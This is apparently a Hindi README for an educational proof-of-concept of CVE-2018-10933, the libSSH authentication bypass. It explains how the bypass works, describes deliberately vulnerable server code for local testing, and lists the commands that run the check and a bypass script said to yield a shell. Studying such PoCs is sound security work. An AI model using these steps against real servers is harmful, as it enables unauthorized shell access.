
CVE-2018-10933 के लिए शैक्षिक उद्देश्य
[स्पष्टीकरण]
यह CVE-2018-10933 के शैक्षिक उद्देश्य के लिए है, जो libSSH प्रमाणीकरण बायपास है!
libssh संस्करण 0.6 और उससे ऊपर के सर्वर कोड में एक प्रमाणीकरण बायपास भेद्यता है।
सर्वर को SSH2_MSG_USERAUTH_SUCCESS संदेश प्रस्तुत करके, जो सर्वर प्रमाणीकरण शुरू करने की उम्मीद करता है,
उस स्थान पर SSH2_MSG_USERAUTH_REQUEST संदेश, हमलावर बिना किसी क्रेडेंशियल के सफलतापूर्वक प्रमाणित हो सकता है।
"patch" फ़ोल्डर में परीक्षण उद्देश्य के लिए सर्वर का संशोधित कोड है (जो किसी भी प्रमाणीकरण के दौरान SSH2_MSG_USERAUTH_SUCCESS पैकेट इंजेक्ट करता है),
क्योंकि इस भेद्यता को libSSH-0.7.5 संस्करण के बाद से पैच किया गया है (पुराने libSSH संस्करण के साथ वातावरण को पुनर्जीवित करना जटिल है)
[उपयोग]
अपनी मशीन पर इस PoC को चलाने के लिए, कृपया निर्देशों का पालन करें।
रिपॉजिटरी को क्लोन करें।
अपनी स्थानीय मशीन में लाइब्रेरी जोड़ें
sudo cp CVE-2018-10933-PoC/libssh-0.8.3/src/* /usr/local/lib
pip install -r requirements.txt
cd libssh-0.8.3
./ssh_server -v [server_IP] -p [port] -d ssh_host_dsa_key -k ssh_host_rsa_key
python3 libSSHcheck.py -t [server_IP] -p [server_port]
फिर आपको संदेश मिलता है जो बैनर है।
पेलोड निष्पादित करें, फिर आपको एक शेल मिलता है:
python3 paramikoBypass.py -t [server_IP] -p [server_port]
=> सफलता!
[संदर्भ]
https://github.com/hackerhouse-opensource/
https://www.exploit-db.com/exploits/45638